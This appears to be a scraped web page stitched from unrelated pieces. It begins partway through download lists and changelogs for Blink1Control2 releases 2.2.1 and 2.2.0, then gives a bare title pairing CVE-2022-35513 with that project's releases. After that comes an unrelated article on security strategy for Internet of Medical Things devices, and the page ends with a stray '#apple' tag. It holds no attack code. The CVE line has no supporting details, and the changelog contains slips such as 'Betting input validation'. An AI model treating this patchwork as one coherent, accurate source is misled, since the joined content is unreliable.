    *   Blink1Control2-2.2.1-win.exe - Windows installer (32-bit and 64-bit)
    *   Blink1Control2-2.2.1-win-x64.zip - Windows zip (64-bit)
    *   Blink1Control2-2.2.1-win-ia32.zip - Windows zip (32-bit)
*   Linux
    
    *   Blink1Control2-2.2.1-linux.tar.gz - Linux 64-bit tarball
    *   Blink1Control2-2.2.1-linux-amd64.deb - Linux x86 64-bit Debian package
    *   Blink1Control2-2.2.1-linux-x86\_64.AppImage - Linux x86 64-bit AppImage

Changes in this release:

*   BigButtons: add context button as alternative to right-click, fix right-click (#98)
*   Fix /blink1/{on,off} for multiple blink(1) devices (#104)
*   Betting input validation on "secs" field in color chooser (#102)
*   Improve meta-pattern parsing for file/script/url event sources (#101)
*   Update to electron 1.8.8, electron-builder 20.36.2, electron-updater 4.0.4

Download the preferred version for your platform:

*   Mac
    *   Blink1Control2-2.2.0-mac.dmg - Mac DMG disk installer
    *   Blink1Control2-2.2.0-mac.zip - Mac zip file
*   Windows
    *   Blink1Control2-2.2.0-win.exe - Windows installer (32-bit and 64-bit)
    *   Blink1Control2-2.2.0-win.zip - Windows zip (64-bit)
    *   Blink1Control2-2.2.0-ia32-win.zip - Windows zip (32-bit)
*   Linux
    *   Blink1Control2-2.2.0-linux-amd64.deb - Linux x86 64-bit Debian package
    *   Blink1Control2-2.2.0-linux-x86\_64.AppImage - Linux x86 64-bit AppImage

CVE-2022-35513: Releases · todbot/Blink1Control2

The high stakes and unique priorities for Internet of Medical Things devices require specialized cybersecurity strategies.

The Internet of Medical Things (IoMT) arguably stands alone when it comes to the threshold of comprehensive IoT security that healthcare delivery organizations must continually meet. Hospitals, physician practices, and integrated delivery systems need to not only keep their own organizations' Web-connected devices and equipment always compliant and secure, but they also must ensure patient safety isn't at risk (and avoid the significant reputational harm that comes from a public breach).

Adding to this challenge is that healthcare organizations tend to deploy uniquely heterogeneous fleets of IoMT devices that contain higher volumes of particularly vulnerable legacy devices. No other industry harnessing IoT capabilities has stakes as high as healthcare, nor such challenging obstacles. As a result, healthcare security teams must carefully craft approaches to address and mitigate certain risks that simply don't exist in other modern IoT implementations.

There are three key points to understand when building an effective IoMT vulnerability management and security strategy. First, because they face thousands of new vulnerabilities every month, IoMT security teams must pick their battles. Second, managing high device churn means introducing security from the moment of adoption. And third, security leaders must form collaborative teams of experts to manage myriad high-risk devices.

**1\. Pick Your Battles**

On average, IoMT device manufacturers publish 2,000 to 3,000 vulnerabilities _every month_. However, they publish patches for only about one in 100 at best. Healthcare delivery organizations can't simply scan IoMT devices for vulnerabilities because doing so will cause many legacy devices to crash. Security teams may attempt to just segment every device for vulnerability remediation and mitigation, but doing this for every device is complex — and maintaining such a segmentation for IoT and IoMT is even more so. Teams cannot rely on scans, don't have nearly enough patches, and new devices are continually added. Soon enough, segmentation erodes and security teams end up with a flat network.

Here's the good news: Just 1% to 2% of IoMT vulnerabilities actually present a high risk in their given environment. An IoMT device's actual risk is very much a function of environmental specifics — a device's connections, nearby devices, its particular use case, and so on. By conducting an _environment-specific_ exploit analysis, security teams can identify a device's true risks and concentrate their finite resources accordingly. Segmentation and other techniques can then focus on fixing the top 1% to 2% of high-risk devices and vulnerabilities.

Security teams should also be aware that attackers are playing this same game — they're probing for vulnerabilities within environments that can serve as springboards for their attack chains. A simple IoMT monitoring device with no data or significant effect on patient outcomes can still become the first domino in a major security event.

**2\. Introduce Security at Adoption**

Security teams must grapple not only with entrenched legacy IoMT devices, but ever-changing device inventories that churn at a rate of 15% per year. To counter this difficulty, security leaders must demand a seat at the decision-making table when new devices are adopted — or at the very least, a heads-up to properly analyze and address vulnerabilities before devices enter active use. That level of consideration is standard across other industries and must be foundational for an effective IoMT security strategy.

In fact, in most other industries an IT department could veto the adoption of solutions that pose a security liability for the organization. Within healthcare delivery organizations, however, IoMT devices with security issues may nevertheless be essential to the higher-priority goal of providing exceptional patient care and patient experiences. That said, healthcare organizations that incorporate security into their IoMT device _acquisition_ processes enable better ongoing security and risk remediation outcomes.

**3\. Form Collaborative Teams of Experts**

Unlike in industries where CSOs might manage homogeneous arrays of inexpensive IoT sensors and have carte blanche to dismiss devices that present any risk they don't like, healthcare demands an entirely different, and holistic, decision-making process. Clinicians carry tremendous weight when it comes to technology decisions because an IoMT device with high risk from an IT security perspective might significantly reduce risks to a patient from a health perspective. IoMT devices that enhance the patient experience, such as vulnerable NICU cameras that nevertheless allow parents to view their newborns, may also justify putting security teams in a tough position.

While it is understandable to decide in favor of supporting health outcomes, security leaders must be prepared to introduce protections that facilitate those decisions. Maximizing IoMT security effectiveness in these challenging circumstances requires security leaders to build an expert team with substantial collected knowledge of current threats and a collaborative mindset enabling the preparation of optimal countermeasures.

**Make IoMT Security an Organizational Priority**

Healthcare security leaders must help their organizations to recognize the tremendous importance and value of IoMT security, even if patient outcomes and experiences come first. At the same time, security leaders should not be daunted by the difficulty of IoMT risk management. Every small step that reduces risk paves the road to a strong security posture.

Tag

#apple